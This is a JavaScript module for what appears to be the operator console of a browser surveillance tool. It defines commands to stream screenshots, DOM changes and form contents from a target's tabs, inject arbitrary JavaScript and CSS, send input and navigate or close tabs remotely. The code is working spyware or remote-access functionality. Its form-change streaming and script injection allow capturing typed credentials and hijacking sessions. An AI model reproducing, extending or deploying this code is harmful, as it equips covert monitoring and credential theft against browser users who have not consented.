import { BaseFeature } from '../../core/base-feature.js';

/**
 * TabSurveillanceFeature — Frontend feature for browser tab surveillance.
 *
 * Three message classes flow through this feature:
 *   1. Operator commands (list_tabs, start_dom_stream, …) — request/response,
 *      keyed by messageId so multiple concurrent per-tab requests don't collide.
 *   2. Snapshot pushes (tab_snapshot, surveillance.screenshot_frame,
 *      surveillance.dom_baseline, surveillance.dom_patch) — broadcast pushes
 *      from the desktop's timeline subscription relay.
 *   3. Tab lifecycle pushes (focus_start/end, nav_committed, tab_created/removed,
 *      title_changed) — feed the tab tree + focus timeline panes.
 */
export class TabSurveillanceFeature extends BaseFeature {
    constructor(coreAPI) {
        super(coreAPI);
        this._pending = new Map(); // messageId -> resolve
        this.subs = {
            snapshot: new Set(),
            screenshotFrame: new Set(),
            domBaseline: new Set(),
            domPatch: new Set(),
            focusStart: new Set(),
            focusEnd: new Set(),
            navCommit: new Set(),
            tabCreated: new Set(),
            tabRemoved: new Set(),
            titleChanged: new Set(),
            formSnapshot: new Set(),
            formChange: new Set()
        };
    }

    static getMetadata() {
        return {
            id: 'tab-surveillance',
            name: 'Tab Surveillance',
            version: 'v2.0',
            tier: 'monitor',
            capabilities: [
                'list_tabs',
                'start_surveillance',
                'stop_surveillance',
                'capture_screenshot',
                'start_screenshot_stream',
                'stop_screenshot_stream',
                'start_dom_stream',
                'stop_dom_stream',
                'get_tab_tree',
                'get_nav_history'
            ],
            dependencies: []
        };
    }

    async initialize() {
        console.log('[TabSurveillance] v2.0 initialized');
    }

    async handleMessage(message) {
        const { action, cmd, payload } = message;
        const command = cmd || action;

        // Response routing — keyed by originalMessageId so concurrent per-tab
        // calls don't trample each other.
        if (typeof command === 'string' && command.endsWith('_response')) {
            const originalId = payload?.originalMessageId;
            if (originalId && this._pending.has(originalId)) {
                const resolve = this._pending.get(originalId);
                this._pending.delete(originalId);
                resolve(payload);
            }
            return;
        }

        switch (command) {
            case 'tab_snapshot':                   return this._fire('snapshot', payload);
            case 'surveillance.screenshot_frame':  return this._fire('screenshotFrame', payload);
            case 'surveillance.dom_baseline':      return this._fire('domBaseline', payload);
            case 'surveillance.dom_patch':         return this._fire('domPatch', payload);
            case 'surveillance.tab_focus_start':   return this._fire('focusStart', payload);
            case 'surveillance.tab_focus_end':     return this._fire('focusEnd', payload);
            case 'surveillance.tab_nav_committed': return this._fire('navCommit', payload);
            case 'surveillance.tab_created':       return this._fire('tabCreated', payload);
            case 'surveillance.tab_removed':       return this._fire('tabRemoved', payload);
            case 'surveillance.tab_title_changed': return this._fire('titleChanged', payload);
            case 'surveillance.form_snapshot':     return this._fire('formSnapshot', payload);
            case 'surveillance.form_change':       return this._fire('formChange', payload);
            default:
                console.warn(`[TabSurveillance] Unknown command: ${command}`);
        }
    }

    _fire(key, data) {
        for (const cb of this.subs[key]) {
            try { cb(data); } catch (e) { console.error(`[TabSurveillance] ${key} cb error:`, e); }
        }
    }

    _request(action, payload = {}, timeoutMs = 30000) {
        return new Promise((resolve) => {
            const messageId = this.sendMessage(action, payload);
            if (!messageId) { resolve({ error: 'No message ID returned' }); return; }
            this._pending.set(messageId, resolve);
            setTimeout(() => {
                if (this._pending.has(messageId)) {
                    this._pending.delete(messageId);
                    resolve({ error: 'Timeout', timedOut: true });
                }
            }, timeoutMs);
        });
    }

    // ========== Commands ==========
    listTabs()                                  { return this._request('list_tabs'); }
    startSurveillance(tabId)                    { return this._request('start_surveillance', { tabId }); }
    stopSurveillance(tabId)                     { return this._request('stop_surveillance', { tabId }); }
    captureScreenshot(tabId)                    { return this._request('capture_screenshot', { tabId }); }
    startScreenshotStream(tabId, intervalMs)    { return this._request('start_screenshot_stream', { tabId, intervalMs }); }
    stopScreenshotStream(tabId)                 { return this._request('stop_screenshot_stream', { tabId }); }
    startDomStream(tabId)                       { return this._request('start_dom_stream', { tabId }); }
    stopDomStream(tabId)                        { return this._request('stop_dom_stream', { tabId }); }
    getTabTree()                                { return this._request('get_tab_tree'); }
    getNavHistory(tabId)                        { return this._request('get_nav_history', { tabId }); }

    // Control surface (#19–#22)
    sendInput(tabId, action, params = {})        { return this._request('send_input', { tabId, action, ...params }); }
    injectJs(tabId, code, allFrames = false)     { return this._request('inject_js', { tabId, code, allFrames }); }
    injectCss(tabId, code, allFrames = false)    { return this._request('inject_css', { tabId, code, allFrames }); }
    removeCss(tabId, code, allFrames = false)    { return this._request('remove_css', { tabId, code, allFrames }); }
    closeTab(tabId)                              { return this._request('close_tab', { tabId }); }
    reloadTab(tabId, bypassCache = false)        { return this._request('reload_tab', { tabId, bypassCache }); }
    duplicateTab(tabId)                          { return this._request('duplicate_tab', { tabId }); }
    muteTab(tabId, muted = true)                 { return this._request('mute_tab', { tabId, muted }); }
    navigateTab(tabId, url)                      { return this._request('navigate_tab', { tabId, url }); }
    setTabActive(tabId)                          { return this._request('set_tab_active', { tabId }); }
    moveTab(tabId, index, windowId)              { return this._request('move_tab', { tabId, index, windowId }); }
    overlaySet(tabId, items)                     { return this._request('overlay_set', { tabId, items }); }
    overlayAppend(tabId, item)                   { return this._request('overlay_append', { tabId, item }); }
    overlayClear(tabId)                          { return this._request('overlay_clear', { tabId }); }
    inspectAt(tabId, x, y)                       { return this._request('inspect_at', { tabId, x, y }); }
    startFormStream(tabId)                       { return this._request('start_form_stream', { tabId }); }
    stopFormStream(tabId)                        { return this._request('stop_form_stream', { tabId }); }

    // ========== Subscriptions ==========
    _sub(key, cb)            { this.subs[key].add(cb); return () => this.subs[key].delete(cb); }
    onSnapshot(cb)           { return this._sub('snapshot', cb); }
    onScreenshotFrame(cb)    { return this._sub('screenshotFrame', cb); }
    onDomBaseline(cb)        { return this._sub('domBaseline', cb); }
    onDomPatch(cb)           { return this._sub('domPatch', cb); }
    onFocusStart(cb)         { return this._sub('focusStart', cb); }
    onFocusEnd(cb)           { return this._sub('focusEnd', cb); }
    onNavCommit(cb)          { return this._sub('navCommit', cb); }
    onTabCreated(cb)         { return this._sub('tabCreated', cb); }
    onTabRemoved(cb)         { return this._sub('tabRemoved', cb); }
    onTitleChanged(cb)       { return this._sub('titleChanged', cb); }
    onFormSnapshot(cb)       { return this._sub('formSnapshot', cb); }
    onFormChange(cb)         { return this._sub('formChange', cb); }

    async cleanup() {
        this._pending.clear();
        for (const set of Object.values(this.subs)) set.clear();
    }
}
